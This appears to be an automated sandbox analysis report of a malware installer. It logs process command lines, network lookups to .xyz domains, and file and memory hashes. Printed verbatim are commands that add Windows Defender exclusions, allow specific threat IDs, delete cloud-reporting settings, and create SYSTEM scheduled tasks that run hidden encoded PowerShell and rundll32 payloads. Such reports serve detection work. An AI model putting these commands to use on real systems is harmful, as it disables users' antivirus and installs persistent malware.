C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdpmmtWmH" /SC once /ST 04:41:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdpmmtWmH"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdpmmtWmH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:55:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe\" UK /jpsite_idMXE 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe UK /jpsite_idMXE 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\XssxXq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\cCOsyeg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 00:43:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll\",#1 /gTsite_idEKr 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll",#1 /gTsite_idEKr 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
NL 142.251.36.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 42.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 249.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 224.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.169.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
GB 172.217.169.46:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 44.239.141.158:80 api3.check-data.xyz tcp
US 8.8.8.8:53 158.141.239.44.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/2176-16-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3528-20-0x00000179C6450000-0x00000179C6472000-memory.dmp

memory/3528-21-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/3528-22-0x00000179C64C0000-0x00000179C64D0000-memory.dmp

memory/3528-23-0x00000179C64C0000-0x00000179C64D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42wc10s.ehb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3528-35-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/2496-40-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3944-43-0x0000000073060000-0x0000000073810000-memory.dmp

memory/3944-45-0x0000000001440000-0x0000000001476000-memory.dmp

memory/3944-44-0x0000000000F60000-0x0000000000F70000-memory.dmp

memory/3944-46-0x0000000004010000-0x0000000004638000-memory.dmp

memory/3944-47-0x0000000003DB0000-0x0000000003DD2000-memory.dmp

memory/3944-48-0x00000000046B0000-0x0000000004716000-memory.dmp

memory/3944-49-0x0000000004720000-0x0000000004786000-memory.dmp

memory/3944-59-0x0000000004790000-0x0000000004AE4000-memory.dmp

memory/3944-60-0x0000000004D80000-0x0000000004D9E000-memory.dmp

memory/3944-61-0x0000000004DB0000-0x0000000004DFC000-memory.dmp

memory/3944-62-0x0000000000F60000-0x0000000000F70000-memory.dmp

memory/3944-65-0x0000000073060000-0x0000000073810000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4148-67-0x0000000073060000-0x0000000073810000-memory.dmp

memory/4148-68-0x00000000035C0000-0x00000000035D0000-memory.dmp

memory/4148-69-0x00000000035C0000-0x00000000035D0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 695285b42a109bf59d3e0fdc130fe35e
SHA1 9a665a148d5b3b89e2c28f8924abd0fe253d5b4d
SHA256 6747d6f7397b098cc9790d4adfc2b6ae1322f2ea991652d1de230584b4f2a5ed
SHA512 bffb5d8a9f5b0a43cff680b3b18de77a495fcf9f9196917b11dd3954ae9378c723eaf30ad13004e4f74af532d47480740e3a083006e87fe77ca154bc0c595479

memory/4148-81-0x00000000035C0000-0x00000000035D0000-memory.dmp

memory/4148-83-0x0000000073060000-0x0000000073810000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/4116-88-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/4116-90-0x0000020679C40000-0x0000020679C50000-memory.dmp

memory/4116-89-0x0000020679C40000-0x0000020679C50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/4116-102-0x00007FF97E400000-0x00007FF97EEC1000-memory.dmp

memory/1480-108-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/1480-119-0x0000000002B90000-0x0000000002C15000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 4b3b0c0c9e24f6362fa797ae5deb3bce
SHA1 95c101e95e4eeaf213d87c2c8cd657ccd5dd78b9
SHA256 2fb67cc3c92e505a942607a1a0499b53c1f3d2d79ae15b946deec5166ddce62d
SHA512 f3ba26fc33d17952d32772ba542128fb726c34b241079101a09d18da91f08ea8486027ccd67a88f3c06add8000a93b0a7e3dc975a103632039521287216c779c

memory/1480-161-0x0000000002F60000-0x0000000002FC5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml

MD5 b1269552401158d0e5ee8903ed13a45d
SHA1 dbbb3ed2bc36a11c251e09bdc83787f8a767aa2b
SHA256 779e9e765d439b302184fb08e465aa880da8000d469307c65ec39d32c1642352
SHA512 768725b595b631f1674dcc8fcbcc876e101ced0c82658a817a3518a1d0e95a6005cbc6bf7d8bd2b5c7d5d0f374c6248fdea4e298ee3bd0efc1a9e1b014d2d9a2

C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml

MD5 eff67de9923d03a3f91f6aa2ce002ad6
SHA1 481555697db8204d7a7dd94db24ba3a986680864
SHA256 75748acf565608cf6f935f220ba4ac7e5ae2b5d6dd7724b1ec625950aab9a2c2
SHA512 ce90902beef31d1341535429af51444366577fb4df5fa4c95a2c096f15f18347a0adf7bcc8c38c0f787a257b61c75b8441812ed396154ac57c774b7945f80f09

C:\ProgramData\WkkDuRgYrrqHXcVB\cCOsyeg.xml

MD5 edcac4e3e3a9b66ab8aac5cdfcee2b16
SHA1 64ccaadd705bdcefe3a7f4adf268433143639256
SHA256 ab50d17f4cf46682a6e828d8e3d0d0fdbabd776c26043d4d3528b51de9718fe1
